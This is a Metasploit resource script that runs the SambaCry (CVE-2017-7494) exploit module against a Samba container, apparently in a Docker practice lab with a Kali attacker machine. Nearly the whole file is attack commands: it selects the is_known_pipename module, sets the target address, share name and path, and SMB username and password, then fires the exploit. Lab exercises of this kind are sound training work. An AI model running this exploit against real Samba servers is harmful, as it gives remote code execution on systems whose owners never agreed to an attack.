# SambaCry CVE-2017-7494 - One-shot exploit
# Run: msfconsole -q -r ~/.msf4/scripts/pwn-sambacry.rc
#
# Prerequisites:
#   - samba container running (docker compose up -d samba)
#   - Kali on 172.20.0.5
# Credentials: sambacry:nosambanocry
#
# Note: This exploit can be flaky. If it fails, try 'exploit' again.

use exploit/linux/samba/is_known_pipename
set RHOSTS 172.20.0.16
set SMB_SHARE_NAME data
set SMB_SHARE_BASE /data
set SMBUser sambacry
set SMBPass nosambanocry
exploit
